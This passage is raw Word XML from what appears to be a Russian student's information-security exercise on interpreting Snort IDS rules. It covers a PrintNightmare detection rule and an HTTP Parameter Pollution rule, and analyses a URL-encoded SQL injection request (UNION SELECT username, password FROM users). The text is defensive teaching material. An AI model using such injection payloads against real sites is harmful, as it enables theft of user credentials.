        <w:t>EXPLOIT</w:t>
      </w:r>
      <w:r w:rsidR="00CC3AE7" w:rsidRPr="00CC3AE7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CC3AE7">
        <w:t>…»)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для трафика </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:r w:rsidR="00CC3AE7">
        <w:t xml:space="preserve"> для любого </w:t>
      </w:r>
      <w:r w:rsidR="00CC3AE7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidR="00CC3AE7">
        <w:t xml:space="preserve"> и порта, который направлен в сеть </w:t>
      </w:r>
      <w:r w:rsidR="00CC3AE7" w:rsidRPr="00CC3AE7">
        <w:t>$</w:t>
      </w:r>
      <w:r w:rsidR="00CC3AE7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HOME</w:t>
      </w:r>
      <w:r w:rsidR="00CC3AE7" w:rsidRPr="00CC3AE7">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="00CC3AE7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NET</w:t>
      </w:r>
      <w:r w:rsidR="00CC3AE7">
        <w:t xml:space="preserve"> (список внутренней сети)</w:t>
      </w:r>
      <w:r w:rsidR="00CC3AE7" w:rsidRPr="00CC3AE7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CC3AE7">
        <w:t xml:space="preserve">на порты 139 и 445 (эти порты </w:t>
      </w:r>
      <w:r w:rsidR="00CC3AE7" w:rsidRPr="00CC3AE7">
        <w:t>используются службами файлов и принтеров Windows</w:t>
      </w:r>
      <w:r w:rsidR="00CC3AE7">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DEC6A7" w14:textId="534999D5" w:rsidR="00D31136" w:rsidRPr="00CC3AE7" w:rsidRDefault="00CC3AE7" w:rsidP="0023253E">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t>Параметр «</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC3AE7">
        <w:t>flow:established</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC3AE7">
        <w:t>,to_server</w:t>
      </w:r>
      <w:r>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="0023253E">
        <w:t xml:space="preserve"> означает</w:t>
      </w:r>
      <w:r w:rsidR="0023253E" w:rsidRPr="0023253E">
        <w:t xml:space="preserve">, что правило будет активировано только для установленного соединения, </w:t>
      </w:r>
      <w:r w:rsidR="00EE2789">
        <w:t>инициированное клиентом</w:t>
      </w:r>
      <w:r w:rsidR="0023253E" w:rsidRPr="0023253E">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00037DF1">
        <w:t xml:space="preserve"> А дальше написаны паттерны, </w:t>
      </w:r>
      <w:r w:rsidR="00037DF1" w:rsidRPr="00037DF1">
        <w:t xml:space="preserve">которые могут указывать на попытку </w:t>
      </w:r>
      <w:r w:rsidR="00037DF1">
        <w:t>использования</w:t>
      </w:r>
      <w:r w:rsidR="00037DF1" w:rsidRPr="00037DF1">
        <w:t xml:space="preserve"> уязвимости </w:t>
      </w:r>
      <w:r w:rsidR="00AC4039">
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00037DF1" w:rsidRPr="00037DF1">
        <w:t>PrintNightmare</w:t>
      </w:r>
      <w:r w:rsidR="00AC4039">
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00037DF1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E34BBA" w14:textId="1B993C07" w:rsidR="00D31136" w:rsidRPr="00AC4039" w:rsidRDefault="00AC4039" w:rsidP="00AC4039">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>######################################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1525B6D6" w14:textId="77777777" w:rsidR="00DF5BDA" w:rsidRPr="00DF5BDA" w:rsidRDefault="00DF5BDA" w:rsidP="00DF5BDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00DF5BDA">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Проанализируйте правило совместно с запросом и объясните, на что сработало правило </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF5BDA">
        <w:t>Snort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF5BDA">
        <w:t xml:space="preserve"> и какую угрозу ИБ представляет собой выполнение данного запроса.</w:t>
      </w:r>
      <w:r w:rsidR="001259C8">
        <w:t xml:space="preserve"> Опишите этапы анализа.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E3F6B3" w14:textId="77777777" w:rsidR="00DF5BDA" w:rsidRDefault="00DF5BDA" w:rsidP="00DF5BDA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD4C67">
        <w:t>Текст</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD4C67">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD4C67">
        <w:t>правила</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Snort</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD4C67">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7C0B64" w14:textId="77777777" w:rsidR="00DF5BDA" w:rsidRPr="00BD4C67" w:rsidRDefault="00DF5BDA" w:rsidP="00DF5BDA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57CDD76A" w14:textId="6C25A65D" w:rsidR="00DF5BDA" w:rsidRPr="00C315DB" w:rsidRDefault="00DF5BDA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</w:pP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alert tcp $EXTERNAL_NET any -&gt; $HOME_NET $HTTP_PORTS (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msg:"WEB_SERVER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 HTTP GET Parameter Pollution v2";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flow:to_client,established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;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content:"GET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"; depth:3; content:"?"; distance:0; within:50;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pcre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:"/[?&amp;][^&amp;]+?=[^&amp;]+?=/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si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"; content:!"Accept-Encoding: gzip";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classtype:client-side-exploit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; sid:3001141; rev:14; metadata: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affected_asset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dst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,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attack_target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 xml:space="preserve"> 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Web_Server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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, category Exploitation;)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009C5518" w14:textId="77777777" w:rsidR="0086007A" w:rsidRPr="00074ADA" w:rsidRDefault="0086007A" w:rsidP="00DF5BDA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ECDE06B" w14:textId="7086DB6A" w:rsidR="00DF5BDA" w:rsidRDefault="00DF5BDA" w:rsidP="00DF5BDA">
      <w:r w:rsidRPr="00DF5BDA">
        <w:t>Текст запроса:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B27135C" w14:textId="77777777" w:rsidR="00FB0A22" w:rsidRPr="00DF5BDA" w:rsidRDefault="00FB0A22" w:rsidP="00DF5BDA"/>
    <w:p w14:paraId="751E6385" w14:textId="581A5EAD" w:rsidR="00DF5BDA" w:rsidRDefault="00DF5BDA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</w:pP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GET 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/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www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.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example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.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com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/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index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.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C02ECB"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php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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-1%2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FUNION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FSELECT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Fusername</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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proofErr w:type="spellStart"/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Dpassword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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FFROM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*%26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id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%3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D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*%2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Fusers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%</w:t>
      </w:r>
      <w:r w:rsidRPr="00C315DB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val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="00074ADA"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  <w:t>2%80%93</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AF0917" w14:textId="03FC5C99" w:rsidR="00E343A5" w:rsidRDefault="00E343A5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Cs w:val="22"/>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="037917A0" w14:textId="44081ECB" w:rsidR="00E343A5" w:rsidRDefault="00E343A5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Ответ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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0692345B" w14:textId="365CFA23" w:rsidR="00E343A5" w:rsidRDefault="00E343A5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ab/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Это правило пытается обнаружить з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агрязнение HTTP-параметров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(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HPP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). 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HPP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проверяет реакцию приложения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на получение нескольких параметров HTTP с одним и тем же именем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что может позволить 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злоумышленник</w:t>
      </w:r>
      <w:r w:rsid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у</w:t>
      </w:r>
      <w:r w:rsidR="00C01ED1" w:rsidRPr="00C01ED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обойти проверку входных данных, вызвать ошибки приложения или изменить значения внутренних переменных.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76850475" w14:textId="44EF55D1" w:rsidR="00C01ED1" w:rsidRDefault="00C01ED1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ab/>
        <w:t>В правиле прописано регулярное выражение (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regex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)</w:t>
      </w:r>
      <w:r w:rsidR="0063117E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которое </w:t>
      </w:r>
      <w:r w:rsidR="0063117E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ищет </w:t>
      </w:r>
      <w:r w:rsidR="003B563A" w:rsidRP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последовательность любых символов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повторяющиеся один или более раз. </w:t>
      </w:r>
      <w:r w:rsid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Символы попадут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в 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regex</w:t>
      </w:r>
      <w:r w:rsidR="003B563A" w:rsidRP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если он</w:t>
      </w:r>
      <w:r w:rsid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и начинаю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тся с символа «?» или «&amp;»</w:t>
      </w:r>
      <w:r w:rsid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, а также содержа</w:t>
      </w:r>
      <w:r w:rsidR="003B563A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т знак «=».</w:t>
      </w:r>
      <w:r w:rsid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Но мне кажется, что это не так сработает</w:t>
      </w:r>
      <w:r w:rsid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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBC1B61" w14:textId="425F6DE3" w:rsidR="00EA7691" w:rsidRDefault="00EA7691" w:rsidP="00B9633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</w:pPr>
      <w:r w:rsidRP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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62076F96" wp14:editId="75AE3459">
            <wp:extent cx="6299835" cy="1088390"/>
            <wp:effectExtent l="19050" t="19050" r="2476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E5D44" w14:textId="77777777" w:rsidR="00EA7691" w:rsidRDefault="00EA7691" w:rsidP="00EA7691">
      <w:pPr>
        <w:pStyle w:val="Textbody"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-2" w:firstLine="708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</w:p>
    <w:p w14:paraId="24C5EF72" w14:textId="41DCA3C7" w:rsidR="00EA7691" w:rsidRDefault="00EA7691" w:rsidP="00EA7691">
      <w:pPr>
        <w:pStyle w:val="Textbody"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-2" w:firstLine="708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Если добавить параметр «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g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», то становится лучше</w:t>
      </w:r>
      <w:r w:rsidRP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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4883CF9E" w14:textId="46C0E4B8" w:rsidR="00EA7691" w:rsidRDefault="00EA7691" w:rsidP="00EA7691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 w:rsidRPr="00EA769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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71133118" wp14:editId="7695F7E4">
            <wp:extent cx="6299835" cy="1048385"/>
            <wp:effectExtent l="19050" t="19050" r="2476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A446B" w14:textId="72B46350" w:rsidR="00EA7691" w:rsidRDefault="00EA7691" w:rsidP="00EA7691">
      <w:pPr>
        <w:pStyle w:val="Textbody"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-2" w:firstLine="708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Но и в первом случае безопасникам придётся </w:t>
      </w:r>
      <w:r w:rsid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постоянно получать уведомления о взломе, даже если пользователь просто будет пользоваться сайтом, где используется параметр, например, «id».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B401B47" w14:textId="06E14039" w:rsidR="00FC7D16" w:rsidRPr="009826BF" w:rsidRDefault="00FC7D16" w:rsidP="00FC7D1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ab/>
        <w:t>Ещё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правило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содержит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«</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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content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:!</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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"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Accept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-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Encoding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: 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gzip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"»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(значит, что в заголовке отсутствует та запись)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, что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в некоторых случаях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может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быть признаком обхода</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC7D16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защитных механизмов</w:t>
      </w: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.</w:t>
      </w:r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Запрос хоть и закодирован в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URL</w:t>
      </w:r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но сервер должен его декодировать, и тогда сработает правило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Snort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, потому что установлен такой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lastRenderedPageBreak/>
        <w:t>параметр: «</w:t>
      </w:r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flow:to_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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client,established</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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»</w:t>
      </w:r>
      <w:r w:rsidR="009826BF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, который сопоставляет ответы</w:t>
      </w:r>
      <w:r w:rsidR="009826BF" w:rsidRPr="009826BF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сервера</w:t>
      </w:r>
      <w:r w:rsidR="009826BF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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2A8132" w14:textId="72AB2E08" w:rsidR="00FC7D16" w:rsidRDefault="00FC7D16" w:rsidP="00FC7D1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</w:p>
    <w:p w14:paraId="2C11E510" w14:textId="4747015F" w:rsidR="00FC7D16" w:rsidRPr="009826BF" w:rsidRDefault="00FC7D16" w:rsidP="00FC7D16">
      <w:pPr>
        <w:pStyle w:val="Textbody"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-2"/>
        <w:jc w:val="both"/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</w:pPr>
      <w:r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ab/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В запросе содержится попытка использования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SQLi</w:t>
      </w:r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вместе с </w:t>
      </w:r>
      <w:r w:rsid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HPP</w:t>
      </w:r>
      <w:r w:rsidR="00841111" w:rsidRPr="00841111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. </w:t>
      </w:r>
      <w:r w:rsidR="009826BF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Выглядит опасно, потому что злоумышленник хочет получить </w:t>
      </w:r>
      <w:r w:rsid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логины и пароли пользователей. И в этом ему может помочь некорректная обработка</w:t>
      </w:r>
      <w:r w:rsidR="009120C8" w:rsidRP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</w:t>
      </w:r>
      <w:r w:rsid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параметра «</w:t>
      </w:r>
      <w:r w:rsid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val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsid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»</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="009120C8" w:rsidRP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 xml:space="preserve"> на стороне сервера</w:t>
      </w:r>
      <w:r w:rsidR="009120C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cstheme="minorBidi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00FC7D16" w:rsidRPr="009826BF" w:rsidSect="00DF5B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567" w:bottom="851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5F1DB" w14:textId="77777777" w:rsidR="00D55F8E" w:rsidRDefault="00D55F8E" w:rsidP="000C49FE">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="278A3ABF" w14:textId="77777777" w:rsidR="00D55F8E" w:rsidRDefault="00D55F8E" w:rsidP="000C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7AAB" w14:textId="77777777" w:rsidR="000C49FE" w:rsidRDefault="000C49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B5825" w14:textId="77777777" w:rsidR="000C49FE" w:rsidRDefault="000C49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EAE5B" w14:textId="77777777" w:rsidR="000C49FE" w:rsidRDefault="000C49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62EAA" w14:textId="77777777" w:rsidR="00D55F8E" w:rsidRDefault="00D55F8E" w:rsidP="000C49FE">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5FA88296" w14:textId="77777777" w:rsidR="00D55F8E" w:rsidRDefault="00D55F8E" w:rsidP="000C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66E01" w14:textId="77777777" w:rsidR="000C49FE" w:rsidRDefault="000C49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28DE4" w14:textId="77777777" w:rsidR="000C49FE" w:rsidRDefault="000C49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E338" w14:textId="77777777" w:rsidR="000C49FE" w:rsidRDefault="000C49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ED4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2230D0AC"/>
    <w:lvl w:ilvl="0" w:tplc="94B2187E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A3B1926"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="613EED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71CA9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5BB48AD2"/>
    <w:lvl w:ilvl="0" w:tplc="BB6001A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0"/>
    <w:rsid w:val="00010C89"/>
    <w:rsid w:val="00020D2E"/>
    <w:rsid w:val="00037DF1"/>
    <w:rsid w:val="000563EA"/>
    <w:rsid w:val="00074ADA"/>
    <w:rsid w:val="00076886"/>
    <w:rsid w:val="00085641"/>
    <w:rsid w:val="000C4808"/>
    <w:rsid w:val="000C49FE"/>
    <w:rsid w:val="000E5D16"/>
    <w:rsid w:val="001259C8"/>
    <w:rsid w:val="00127283"/>
    <w:rsid w:val="0014303D"/>
    <w:rsid w:val="001C0D05"/>
    <w:rsid w:val="002024DC"/>
    <w:rsid w:val="002307FF"/>
    <w:rsid w:val="0023253E"/>
    <w:rsid w:val="0026596C"/>
    <w:rsid w:val="002A70C1"/>
    <w:rsid w:val="00300695"/>
    <w:rsid w:val="00350F0A"/>
    <w:rsid w:val="00376E85"/>
    <w:rsid w:val="00395645"/>
    <w:rsid w:val="003A29A4"/>
    <w:rsid w:val="003B563A"/>
    <w:rsid w:val="003D089B"/>
    <w:rsid w:val="00451423"/>
    <w:rsid w:val="004646C7"/>
    <w:rsid w:val="004779BB"/>
    <w:rsid w:val="00496183"/>
    <w:rsid w:val="00520526"/>
    <w:rsid w:val="00537B67"/>
    <w:rsid w:val="005508A3"/>
    <w:rsid w:val="005604B7"/>
    <w:rsid w:val="00585496"/>
    <w:rsid w:val="00587ED5"/>
    <w:rsid w:val="00591BB4"/>
    <w:rsid w:val="005A2DFE"/>
    <w:rsid w:val="005E17D5"/>
    <w:rsid w:val="0063117E"/>
    <w:rsid w:val="006F27E0"/>
    <w:rsid w:val="00755D9E"/>
    <w:rsid w:val="0076344D"/>
    <w:rsid w:val="007A267F"/>
    <w:rsid w:val="007C1156"/>
    <w:rsid w:val="00820298"/>
    <w:rsid w:val="00841111"/>
    <w:rsid w:val="0086007A"/>
    <w:rsid w:val="008615D3"/>
    <w:rsid w:val="008A63E1"/>
    <w:rsid w:val="008C2EBE"/>
    <w:rsid w:val="008D39FE"/>
    <w:rsid w:val="009120C8"/>
    <w:rsid w:val="00931174"/>
    <w:rsid w:val="00941FB4"/>
    <w:rsid w:val="00955991"/>
    <w:rsid w:val="009826BF"/>
    <w:rsid w:val="00A253EB"/>
    <w:rsid w:val="00A53F70"/>
    <w:rsid w:val="00AC4039"/>
    <w:rsid w:val="00B068CD"/>
    <w:rsid w:val="00B26904"/>
    <w:rsid w:val="00B571E8"/>
    <w:rsid w:val="00B735FA"/>
    <w:rsid w:val="00B87F76"/>
    <w:rsid w:val="00B96336"/>
    <w:rsid w:val="00BA4818"/>
    <w:rsid w:val="00BC562B"/>
    <w:rsid w:val="00C01ED1"/>
    <w:rsid w:val="00C02ECB"/>
    <w:rsid w:val="00C17270"/>
    <w:rsid w:val="00C315DB"/>
    <w:rsid w:val="00C842BB"/>
    <w:rsid w:val="00CC086B"/>
    <w:rsid w:val="00CC3AE7"/>
    <w:rsid w:val="00D07BD6"/>
    <w:rsid w:val="00D2670E"/>
    <w:rsid w:val="00D31136"/>
    <w:rsid w:val="00D374B8"/>
    <w:rsid w:val="00D55F8E"/>
    <w:rsid w:val="00D84620"/>
    <w:rsid w:val="00DF5BDA"/>
    <w:rsid w:val="00E04296"/>
    <w:rsid w:val="00E230DA"/>
    <w:rsid w:val="00E343A5"/>
    <w:rsid w:val="00E41E0E"/>
    <w:rsid w:val="00E50DA2"/>
    <w:rsid w:val="00E62860"/>
    <w:rsid w:val="00EA7691"/>
    <w:rsid w:val="00EB15C8"/>
    <w:rsid w:val="00ED28B5"/>
    <w:rsid w:val="00EE2789"/>
    <w:rsid w:val="00EF4857"/>
    <w:rsid w:val="00F14D8F"/>
    <w:rsid w:val="00F435F0"/>
    <w:rsid w:val="00F52583"/>
    <w:rsid w:val="00F6574E"/>
    <w:rsid w:val="00F94EE5"/>
    <w:rsid w:val="00FB0A22"/>
    <w:rsid w:val="00F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24F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B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5B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F5BDA"/>
    <w:pPr>
      <w:spacing w:after="283" w:line="276" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a3">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00E230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49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C49FE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0C49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C49FE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5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3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119C-E50B-4DF2-AF3F-05231E18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2023-03-28T05:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-12T07:23:00Z</dcterms:modified>
</cp:coreProperties>
</file>